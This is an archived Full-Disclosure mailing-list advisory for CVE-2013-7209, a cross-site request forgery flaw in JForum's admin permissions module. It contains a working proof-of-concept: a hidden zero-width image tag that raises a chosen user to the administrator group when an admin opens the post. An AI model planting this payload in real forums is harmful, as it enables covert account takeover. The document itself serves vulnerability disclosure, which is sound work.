[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability
From: arno <arno.chen@xxxxxxxxxxxxxxxxxxxx>
Date: Thu, 26 Dec 2013 17:03:58 +0800

Version        : All

Vulnerability   : Cross-site request forgery

Problem type   : remote

CVE ID         : CVE-2013-7209

 

Jforum Admin module, modify user permissions module exists  crsf  
Vulnerability,use the following code into jforum forum posts, as long as this 
administrators is opened this post, the permissions of user with id 12696  will 
be Escalated to  the group with id 2 permissions,default group with id 2 is 
administrator group.

Code:

<img 
src=http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2
 width=0 />

 

Code Description:

http://www.target.com/forum/   jforum forum address,

12696 for the user id

2 group id

width=0 is used to hide pic 

It was discovered by arno @dbappsecurity.com.cn

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [Wooyun] Safari for windows PhishingAlert bypass vuln
Next by Date: Re: [Full-disclosure] Happy Holidays / Xmas Advisory
Previous by thread: [Full-disclosure] [Wooyun] Safari for windows PhishingAlert bypass vuln
Next by thread: [Full-disclosure] Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
Index(es):
- Date
- Thread